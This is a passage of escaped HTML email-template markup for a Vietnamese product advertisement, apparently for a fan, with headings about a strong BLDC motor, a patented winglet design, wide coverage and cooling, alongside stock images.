style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"background-color: #ecf0f1;width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"background-color: #ecf0f1;width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-weight: 400; color: #000000; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">\\u0110\\u1ed8NG C\\u01a0 BLDC SI\\u00caU M\\u1eceNG<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"background-color: #ecf0f1;width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681373075524-Powerful3-04.jpeg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"background-color: #ecf0f1;width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">THI\\u1ebeT K\\u1ebe WINGLET \\u0110\\u01af\\u1ee2C C\\u1ea4P B\\u1eb0NG S\\u00c1NG CH\\u1ebe<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"background-color: #ecf0f1;width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681373089045-Powerful3-05.jpeg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"background-color: #ecf0f1;width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">M\\u1ede R\\u1ed8NG KHU V\\u1ef0C BAO PH\\u1ee6<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"background-color: #ecf0f1;width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681373107028-Powerful3-06.jpeg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"background-color: #ecf0f1;width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"background-color: #ecf0f1;width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">KH\\u00d4NG CH\\u1ec8 L\\u00c0M M\\u00c1T-M\\u00c0 C\\u00d2N H\\u01a0N TH\\u1ebe N\\u1eeeA<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"150\\\" style=\\\"background-color: #ecf0f1;width: 150px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-25\\\" style=\\\"max-width: 320px;min-width: 150px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">Gi\\u1ea3m nhi\\u1ec7t \\u0111\\u1ed9 v\\u00e0 cung c\\u1ea5p s\\u1ef1 th\\u00f4ng gi\\u00f3<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"150\\\" style=\\\"background-color: #ecf0f1;width: 150px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 